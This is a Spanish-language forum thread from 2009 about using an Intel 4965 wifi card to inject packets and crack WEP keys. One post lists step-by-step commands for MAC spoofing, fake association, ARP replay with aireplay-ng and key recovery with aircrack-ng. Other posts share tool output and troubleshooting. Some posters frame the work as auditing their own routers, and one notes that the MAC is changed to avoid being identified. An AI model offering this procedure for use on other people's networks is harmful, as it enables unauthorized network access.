Autor Tema: Inyectar con 4965  (Leído 210471 veces)

0 Usuarios y 1 Visitante están viendo este tema.

ChimoC

  • Visitante
Re: Inyectar con 4965
« Respuesta #220 en: 04-03-2009, 10:03 (Miércoles) »
Buenas:

Ok... ya he puesto un post en Manuales de Wifislax y Wifiway  ;D

https://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/inyectar-con-4965-by-jaco-y-bht-sata/

Un saludo

ChimoC



supumaster

  • Visitante
Re: Inyectar con 4965
« Respuesta #221 en: 05-03-2009, 19:59 (Jueves) »
simplemente daros las gracias  a la gente de este foro ya k e consegido autentificarme e inyectar, con esta coñazo de tarjeta a demas lo estoy haciendo directamente desde mi ubuntu 8.10

si algien le interesa instalarse los drivers yo lo sake de esta web http://weblogs.inf.udp.cl/nboettcher/07/11/2008/inyectar-paquetes-con-intel-pro-wireless-4965-abgn-mac80211-en-ubuntu-intrepid-ibex-810/




manuserra

  • Visitante
Re: Inyectar con 4965
« Respuesta #222 en: 10-03-2009, 03:45 (Martes) »
a mi me funciona tdo perfecto. eso si teneis k tener en cuenta k esta tarjeta su recepcion es una porkeria y si no teneis una señal bastante buena ni podreis inyectar o tardareis muxisimo o luego le costara sacar la contraseña, asik si la teneis integrada en un portatil, ponerle bien elevadito y cerca de la ventana.

saludos

yiyi jr

  • Visitante
Re: Inyectar con 4965
« Respuesta #223 en: 10-03-2009, 23:43 (Martes) »
hola muy buenas,tengo el siguiente problema,ago todo lo k pone en este manual Inyectar con 4965 by Jaco, Bht Sata y Dexter Back,y al final cuadno ejecuto para obtener la clave, me sale esto index number of target network,el resto del proceso me sale bien y me inyecta bien,
Como puedo solucionar esto???Alguna idea???
Muxas gracias de antemano.

Bht Sata

  • Visitante
Re: Inyectar con 4965
« Respuesta #224 en: 12-03-2009, 19:42 (Jueves) »
a mi me funciona tdo perfecto. eso si teneis k tener en cuenta k esta tarjeta su recepcion es una porkeria y si no teneis una señal bastante buena ni podreis inyectar o tardareis muxisimo o luego le costara sacar la contraseña, asik si la teneis integrada en un portatil, ponerle bien elevadito y cerca de la ventana.

saludos

Lo siento pero no estoy de acuerdo, es una buena tarjeta, y tiene un alcance considerable, no hay ninguna necesidad de hacer lo que tu dices  ;)

hola muy buenas,tengo el siguiente problema,ago todo lo k pone en este manual Inyectar con 4965 by Jaco, Bht Sata y Dexter Back,y al final cuadno ejecuto para obtener la clave, me sale esto index number of target network,el resto del proceso me sale bien y me inyecta bien,
Como puedo solucionar esto???Alguna idea???
Muxas gracias de antemano.

Escribe la sintaxis que utilizas para el aircrack y la cantidad de iv's capturados, una captura con el mensaje que te devuelve seria de gran ayuda, 1 saludo  ;)

xeonpj

  • Visitante
Re: Inyectar con 4965
« Respuesta #225 en: 17-03-2009, 21:10 (Martes) »
hola amigos.

Haber, despues de requetelerme el manual, empiezo a tener los conceptos algo claros.
El caso es k mi tarjeta es una link 5100, pero segun estube leyendo llege a este porst, ya que se supone k para inyectar hay k seguir estos pasos.El portatil es un HP, el del media mark de 599€ de 13".

Estoy intentando esta movida con mi AP belkin, sin filtro mac, con clave wep de 128bit y sin clientes asociados.

Creo el archivo, ejecuto el wpa replicant... todo ok, por el airodump puedo ver que estoy asociado....

ejecuto el airplay, y no sube ni un data, el beacon se mueve, parece que todo bien pero no es capaz de inyectar nada....

Que se supone k hago mal?
Puede que tarde mas de 10 minutos en empezar a subir paketes?
pruebo con otro atake que no sea el 3?
Si por ejemplo asocio mi PDA, seria necesario hacer una autentificacion falsa con el wpa replicant? o directamente le meto el aireplay con la mac de la pda?
Venga un saludo maestros, y gracis por tener paciencia.

PD: nunca he tocado linux, y la verdad es k noto lo mal k ando en este OS.

JuaNaN_

  • Visitante
Re: Inyectar con 4965
« Respuesta #226 en: 17-03-2009, 22:32 (Martes) »
ese ataque sin ningun cliente generando trafico via wifi puede tardar muuuuuucho,necesitarias conectarte a ese router desde otro pc/portatil/pda/ect via wifi y generar trafico.

xeonpj

  • Visitante
Re: Inyectar con 4965
« Respuesta #227 en: 18-03-2009, 09:45 (Miércoles) »
entonces sin clientes puedo aplicar el atake 2 del airplay?

od e que manera seria factible atacar sin clientes?

Aunque hay uan cosa que no entiendo, si nos asociamos al AP, ya somos un cliente no? ademas con el aireplay generamos el supuesto trafico necesario, para que el airodump pille los datas no?

si me ekivoco en ago, por favor, corregidme, kiero aclarar conceptos.

pekis

  • Visitante
Re: Inyectar con 4965
« Respuesta #228 en: 23-03-2009, 10:05 (Lunes) »
Bueno despues de leer todo el post y otros post que he estado leyendo por aí.  He seguido al pie de la letra todo lo que se dice en el manual de ChimoC y he conseguido con el comando wpa_supplicant que se me asocie y luego e ejecutado los otros comandos tal cual se dice en el manual. El problema que como he podido observar es muy común es que realmente no consigo que inyecte, solo suben los paquetes READ y se queda así subiendo. El resto todo esta bien ya que yo aparezco con mi mac asociada en el router y todo. Una posible solucion que he leido es que no use una mac falsa de tipo 11:22:33:44:55 ya que algunos routers no la aceptan,puede ser correcto?

¿Que posible solucion tiene? uso una tarjeta intel 4965 agn y tiene una sensibilidad increible.


salu2 y gracias por andelantado

keeperro

  • Visitante
Re: Inyectar con 4965
« Respuesta #229 en: 23-03-2009, 10:33 (Lunes) »
yo tengo este dispositivo y me funciona bien lo unico que yo prefiero hacer el wpa_supplicant despues de airodump xq si no es asi no se me asocia depues de eso en dos minutos empieza a tirar bien...
lo de la mac en realidad puedes poner la que kieras inventada o incluso la tuya, creo que se cambia por temas de no identificarse que es una tonteria xq en teoria debemos ser buenos y solo probar con nosotros mismo... aunque me puedo esta ekivocando

xeonpj

  • Visitante
Re: Inyectar con 4965
« Respuesta #230 en: 23-03-2009, 11:03 (Lunes) »
yo tengo este dispositivo y me funciona bien lo unico que yo prefiero hacer el wpa_supplicant despues de airodump xq si no es asi no se me asocia depues de eso en dos minutos empieza a tirar bien...
lo de la mac en realidad puedes poner la que kieras inventada o incluso la tuya, creo que se cambia por temas de no identificarse que es una tonteria xq en teoria debemos ser buenos y solo probar con nosotros mismo... aunque me puedo esta ekivocando

entocnes como se supone k lo haces tu? peudes poner los pasos exactos?

yo tengo la link 5100 pero se supone k es igual k esta, el casoe s k ya lo daba por imposible, taba pensando en actualizar el kernel del wifiway.

JuaNaN_

  • Visitante
Re: Inyectar con 4965
« Respuesta #231 en: 23-03-2009, 11:27 (Lunes) »
yo tengo este dispositivo y me funciona bien lo unico que yo prefiero hacer el wpa_supplicant despues de airodump xq si no es asi no se me asocia depues de eso en dos minutos empieza a tirar bien...
lo de la mac en realidad puedes poner la que kieras inventada o incluso la tuya, creo que se cambia por temas de no identificarse que es una tonteria xq en teoria debemos ser buenos y solo probar con nosotros mismo... aunque me puedo esta ekivocando


ami me va bien con algunas no con todas haciendo lo que sale en el manual.
entocnes como se supone k lo haces tu? peudes poner los pasos exactos?

yo tengo la link 5100 pero se supone k es igual k esta, el casoe s k ya lo daba por imposible, taba pensando en actualizar el kernel del wifiway.

keeperro

  • Visitante
Re: Inyectar con 4965
« Respuesta #232 en: 23-03-2009, 11:34 (Lunes) »
1 tomo los datos de de la red mac, essid y canal y creo el arxivo wpa.conf
2airmon-ng start wlan0 channel (el numero que le corresponda)
3ifconfig wlan0 down
4macchanger -m (mac falsa, la de un cliente o la que te guste) wlan0 [este paso lo puede suprimir junto al 3 y el 5 si dejas tu mac
5ifconfig wlan0 up
6airodump-ng -w (nombre del arxivo) -c (el canal de la red) --bssid (la mac del ap) mon0
7wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0
8aireplay-ng -3 -b (mac ap) -h (mac de tu dispositivo ten en cuenta si la as cambiado)
9aircrack-ng -z *.cap

yo en realidad siempre cambio la mac por 00:11:22:33:44:55 pero creo que se puede dejar la tuya... ;)

xeonpj

  • Visitante
Re: Inyectar con 4965
« Respuesta #233 en: 23-03-2009, 11:52 (Lunes) »
1 tomo los datos de de la red mac, essid y canal y creo el arxivo wpa.conf
2airmon-ng start wlan0 channel (el numero que le corresponda)
3ifconfig wlan0 down
4macchanger -m (mac falsa, la de un cliente o la que te guste) wlan0 [este paso lo puede suprimir junto al 3 y el 5 si dejas tu mac
5ifconfig wlan0 up
6airodump-ng -w (nombre del arxivo) -c (el canal de la red) --bssid (la mac del ap) mon0
7wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0
8aireplay-ng -3 -b (mac ap) -h (mac de tu dispositivo ten en cuenta si la as cambiado)
9aircrack-ng -z *.cap

yo en realidad siempre cambio la mac por 00:11:22:33:44:55 pero creo que se puede dejar la tuya... ;)

todo esto, con el live cd del wifiway, sin actualizar absolutamente nada?
Eso lo hecho mil veces con mi 5100 y no tira, en cambio con la realink esta pci, me empieza a inyectar del tiron. Se que del AP no es por que con la ralink tira del tiron, y lot engo sin filtro mac ni nada raro.

EDIT: yo hagoe l tutorial, pero lo k tu dices es lanzar antes el airdump y luego el WPAsupli.... la verdad es que no entiendo el por k asi, pero tendre k probarlo...
« Última modificación: 23-03-2009, 12:14 (Lunes) por xeonpj »

pekis

  • Visitante
Re: Inyectar con 4965
« Respuesta #234 en: 23-03-2009, 20:04 (Lunes) »
Bueno ya he conseguido sacar mi primera clave con la 4965 y me asalta una duda sencilla. ¿Por que solo se me asocia con el wpa_supplicant a algunos router y a otros no?
Hay alguna manera de solucionarlo?

gracias

salu2

xeonpj

  • Visitante
Re: Inyectar con 4965
« Respuesta #235 en: 24-03-2009, 09:27 (Martes) »
definitivamente no inyecta ni por activa ni por pasiva, con el hp este es imposible, esperare a una nueva version.

Saludos.

Picardias

  • Visitante
Re: Inyectar con 4965
« Respuesta #236 en: 24-03-2009, 13:42 (Martes) »
Hola a todos. Me presento, soy un novatillo en esto de las auditorías wifis, y siempre estoy intentando adquirir nuevos conocimientos, y lo de linux y esto lo tenía pendiente, así que ahora con un poquito de dedicación estoy intentando aprender.

Para empezar, tengo un router Livebox de Orange que uso como "víctima" para estos menesteres, y como PC uso un Dell XPS M1530 que trae esta tarjeta wifi de intel. Supuestamente este router nos lo venden como muy seguro.

Bien, he seguido los pasos del tutorial, y todo perfecto hasta que llegamos a:

wpa_supplicant -c/root/wpa.conf -Dwext -iwlan0

En este momento me comienza un bucle infinito:

Código: [Seleccionar]
wifiway ~ # wpa_supplicant -c/root/Desktop/wpa.conf -Dwext -iwlan0
ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Authentication with 00:00:00:00:00:00 timed out.
Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Authentication with 00:00:00:00:00:00 timed out.
Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
Authentication with 00:00:00:00:00:00 timed out.
Trying to associate with 00:1f:e1:02:aa:bf (SSID='Livebox-1230' freq=2412 MHz)
ioctl[SIOCSIWENCODEEXT]: Invalid argument
Associated with 00:1f:e1:02:aa:bf
CTRL-EVENT-CONNECTED - Connection to 00:1f:e1:02:aa:bf completed (auth) [id=0 id_str=]

Bien, como podeís ver, al final me conecta, pero es porque este router tiene un botón atras que hay que pulsar a la hora de asociar nuevos dispositivos, lo he pulsado y es cuando ha conectado. Así no tiene gracia XD, así que me pregunto, ¿He echo algo mal? Aquí vienen algunas dudas:

Para crear el wpa.conf, simplemente creo nuevo documento de texto en el escritorio y lo renombro a wpa.conf, ¿Lo hago bien? ¿Es wpa.conf, aunque el cifrado sea wep?

Hecho esto y aunque pulsé el botón, decidí seguir a ver hasta donde podía llegar. Creo que me salió todo correcto:

Código: [Seleccionar]
wifiway ~ # aireplay-ng -3 -b 00:1F:E1:02:AA:BF -h 00:11:22:33:44:55 mon0
For information, no action required: Using gettimeofday() instead of /dev/rtc
The interface MAC (00:1F:3B:12:CB:0F) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:11:22:33:44:55
13:11:41  Waiting for beacon frame (BSSID: 00:1F:E1:02:AA:BF) on channel 1
Saving ARP requests in replay_arp-0324-131141.cap
You should also start airodump-ng to capture replies.
^Cad 114095 packets (got 1 ARP requests and 0 ACKs), sent 289791 packets...(499 pps)

Código: [Seleccionar]

Hasta que llegué aquí...

Código: [Seleccionar]
wifiway ~ # aircrack-ng -z *.cap
Opening dexter-back-01.cap
Opening replay_arp-0324-131141.cap
Read 811291 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1F:E1:02:AA:BF  Livebox-1230              WEP (0 IVs)
   2  00:1E:4C:5F:DC:2E  Livebox-0BB8              No data - WEP or WPA

Index number of target network ? 1

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 0 ivs.

                                       Aircrack-ng 0.9.3


                       [00:00:00] Tested 0/1400000 keys (got 0 IVs)

   KB    depth   byte(vote)
    0    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    1    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    2    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    3    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    4    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    5    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    6    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    7    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    8    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
    9    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
   10    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
   11    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)
   12    0/  1   00(   0) 01(   0) 02(   0) 03(   0) 04(   0) 05(   0) 06(   0) 07(   0)

     KEY FOUND! [ 00:00:00:00:00:00:00:00:00:00:00:00:00 ] (ASCII: ............. )
        Decrypted correctly: 100%

Me pone que ha encontrado la clave... pero no sale nada.

¿Sugerencias?

Muchas gracias

xeonpj

  • Visitante
Re: Inyectar con 4965
« Respuesta #237 en: 24-03-2009, 13:48 (Martes) »
k va tio, si te fijas no tiens ningun iv´s, para encontrar la clave necesitas 50000 (yo lo hice con 20000 pero tarda un pelo ams y no seguro del todo, y 50000 usando la opcion del aircrack -z)  .Que tiene la 5100? si es asi.... jejej mejor no te digo na, pero no te machaques musho k con el wifiway " a pelo" no furula. Si te fijas en el aireplay, solo te inyecto un ARP, y no va bien.

Picardias

  • Visitante
Re: Inyectar con 4965
« Respuesta #238 en: 24-03-2009, 14:03 (Martes) »
k va tio, si te fijas no tiens ningun iv´s, para encontrar la clave necesitas 50000 (yo lo hice con 20000 pero tarda un pelo ams y no seguro del todo, y 50000 usando la opcion del aircrack -z)  .Que tiene la 5100? si es asi.... jejej mejor no te digo na, pero no te machaques musho k con el wifiway " a pelo" no furula. Si te fijas en el aireplay, solo te inyecto un ARP, y no va bien.

No, tiene la 4965, no va con el Wifiway a pelo???

Que tengo que hacer entonces para obtener mas iv´s, dios, estoy un poco bestante perdido jejej

Gracias

xeonpj

  • Visitante
Re: Inyectar con 4965
« Respuesta #239 en: 24-03-2009, 14:08 (Martes) »
k va tio, si te fijas no tiens ningun iv´s, para encontrar la clave necesitas 50000 (yo lo hice con 20000 pero tarda un pelo ams y no seguro del todo, y 50000 usando la opcion del aircrack -z)  .Que tiene la 5100? si es asi.... jejej mejor no te digo na, pero no te machaques musho k con el wifiway " a pelo" no furula. Si te fijas en el aireplay, solo te inyecto un ARP, y no va bien.

No, tiene la 4965, no va con el Wifiway a pelo???

Que tengo que hacer entonces para obtener mas iv´s, dios, estoy un poco bestante perdido jejej

Gracias

no no, perdona, si tienes esa, se supone k asi si, cuanto tiempo has esperado? prueba como dice el compañero,  ejecuta antes el airdump y luego el WPA, con la mia eso da error "busy" osease tarjeta ocupada.

te aconsegaria que probaras con otro router, haber si es k ese no deja-



//FINAL Y MÁS DOS RESPUESTAS